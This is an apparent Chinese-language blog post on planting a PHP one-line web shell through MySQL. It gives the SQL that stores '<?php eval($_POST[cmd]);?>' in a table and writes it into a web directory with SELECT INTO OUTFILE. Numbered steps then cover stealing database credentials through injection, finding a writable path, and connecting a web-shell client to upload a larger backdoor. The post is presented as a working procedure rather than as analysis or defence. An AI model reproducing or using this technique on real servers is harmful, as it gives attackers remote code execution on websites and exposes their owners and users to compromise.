boxmoe_header_banner_img

⋅無⋅限⋅進⋅步⋅

加载中

文章导读

Mysql一句话木马


avatar
yuhui 2025年10月24日 24

Mysql一句话木马

USE mysql;
# MySQL 返回的查询结果为空(即零行)
CREATE TABLE a(
cmd1 text NOT NULL
);
# MySQL 返回的查询结果为空(即零行)
INSERT INTO a( cmd1 )
VALUES (
'<?php eval($_POST[cmd]);?>'
);
# 影响列数: 1
SELECT cmd1
FROM a
INTO OUTFILE '/data/www/heneng/cp/mm.php';
# 影响列数: 1
DROP TABLE IF EXISTS a;# MySQL 返回的查询结果为空(即零行)。
# MySQL 返回的查询结果为空(即零行)。

1.首先通过注入获取mysql数据库的用户名和密码

2.通过相关渠道获取mysql数据库的路径

3.使用用户名和密码登陆mysql

4.获取网站可写目录的绝对路径

5.点击进入sql编辑器,输入上述代码,将一句话木马写入网站

6.使用菜刀连接一句话,上传大马

mysql日志注入一句话木马

更新: 2025-05-15 09:14:21
原文: https://www.yuque.com/yuhui.net/network/oief4445m8ro7eov



评论(0)

查看评论列表

暂无评论


发表评论

表情 颜文字

插入代码